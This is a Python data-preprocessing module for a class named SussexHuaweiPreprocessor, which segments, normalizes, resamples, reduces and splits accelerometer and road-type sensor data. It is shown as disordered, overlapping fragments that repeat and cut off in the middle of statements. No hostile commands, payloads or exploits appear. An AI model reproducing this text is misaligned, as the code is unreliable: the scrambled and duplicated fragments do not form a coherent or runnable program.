data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean", "data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] =", "- data.min()) # to center around 0.0 substract 0.5 return data except (TypeError,", "Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt)", "= segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std =", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data,", "segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode,", "None, mean = None, std = None): \"\"\" Apply z-normalization to a data", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative", "data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels)", "segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment", "using an encoding function. :param data: :param mode: :param columns: :param encoding_function: :return:", "@overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set.", "List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz", "or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode,", "def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label.", "0.5 else: data = (data - data.min()) / (data.max() - data.min()) # to", "selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length", ":param columns: :param quantile: :param threshold: :return: \"\"\" try: if data is None", "== 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column]", "remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data =", "selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train,", "= self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments", ":param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "data, columns = None, mean = None, std = None): \"\"\" Apply z-normalization", ":return: \"\"\" try: if data is None or replacement_mode is None or columns", "= [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3]", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long or", "data = data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe", "# 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train", "return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "# Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square,", "for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns =", "= data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1],", "label_column: :param args: :return: \"\"\" try: if data is None or mode is", "time series based on a label column, semantic segementation of a fixed interval.", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None:", "std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train,", "#Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) !=", "- data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std() data =", ":param data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe #", "= pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not exact_length: for", "as time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data", "def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for training.", "to date time. :param data: :param column: :param unit: :return: \"\"\" # Source:", "axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data =", "index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data,", "isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "selected_columns: :param axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)):", "\"\"\" Remove rows that have an unwanted label. :param data: :param unwanted_labels: :param", "@overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date", "pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz =", "= 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return", "(data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except", "= labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns =", "current run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid =", "run @0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()]", "or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column],", "from local vehicle coordinates to a global coordinate system. :param data: :param target_columns:", "import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import", "for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid,", "a threshold value. :param data: :param replacement_mode: :param columns: :param quantile: :param threshold:", "of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between(", "segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", "not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels)", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\"", "data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std", ")[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing", "segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if", "std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms')", "else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined =", "not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit)", "data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean,", "an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if", "time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data =", "data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)", "data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime", "self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode,", "= None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns,", "= 'mean') if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined,", "#Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment", "columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else:", "or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param", "return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) #", "Project accelerometer data from local vehicle coordinates to a global coordinate system. :param", "axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)): if data", "freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str):", "after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length:", "data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None for ind", "\"\"\" Apply z-normalization to a data set. :param data: :param columns: :param mean:", "split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len *", "data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args):", "not None: data[columns] = (data[columns] - mean) / std else: data = (data", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self,", "if columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns] =", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None):", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()]", ") #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "= ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5]", "import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas from", "== 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns):", "str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data", "== 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced", "= data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index)", "args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)):", "for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all", "data): \"\"\" Change representation of a data set. :param current_representation: :param target_representation: :param", "data.mean() std = data.std() data = (data - data.mean()) / data.std() elif mean", "selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test,", "on quantile or a threshold value. :param data: :param replacement_mode: :param columns: :param", ":return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None", "'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise", "= data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column]", "List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]", "= data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5,", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self,", ") for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label',", "data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "chunk_size + 1, axis=0) # 1. Ensure index is datetime index and standardize", "in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode", "target_columns: :param mode: :param args: :return: \"\"\" try: if data is None or", "is not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] -", "= pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError):", "label column, semantic segementation of a fixed interval. :param data: :param mode: :param", "@0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns)", "~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "= data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row')", "= data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1)", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\"", "print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train,", "None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True)", "\"\"\" try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "too long or too short after splitting min_length_subsegements = [] for segment in", "is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data =", "params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1],", "= self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid", ":param mode: :param args: :return: \"\"\" try: if data is None or target_columns", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not", "segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long", "= self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns):", "= config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data,", "if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation", "data segments = split(data, segment_length) if not exact_length: for segment in segments: segment.index", "data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample", "aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and", "make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train", "data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing,", "isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': #", "Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long or too short", "import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None,", "data: :param mode: :param label_column: :param args: :return: \"\"\" try: if data is", "'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train =", "data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for", "std is None: if columns is not None: mean = data[columns].mean() std =", "unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str)", "or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode,", "return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data,", "Apply z-normalization to a data set. :param data: :param columns: :param mean: :param", "unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\"", "/ data.std() elif mean is not None and std is not None: if", "TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract", "args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels',", "= 0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param axis:", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] #Test", "self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data =", "data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val',", "args: selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent indices #", "# to center around 0.0 substract 0.5 else: data = (data - data.min())", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self,", "data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data", "column, semantic segementation of a fixed interval. :param data: :param mode: :param label_column:", "reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to", "Segements a time series based on a label column, semantic segementation of a", "pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in", "type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode", "int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz)", "selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data =", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time", "None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns", "'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] =", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or", "import overrides import traceback import os import pandas from sklearn.decomposition import PCA import", "current_representation, target_representation, data): \"\"\" Change representation of a data set. :param current_representation: :param", "selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms'", "args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)):", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode ==", "for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "# '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans')", "if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean", "segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference.", "data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)):", "selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2],", "raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns is", "= data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else:", "remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True,", 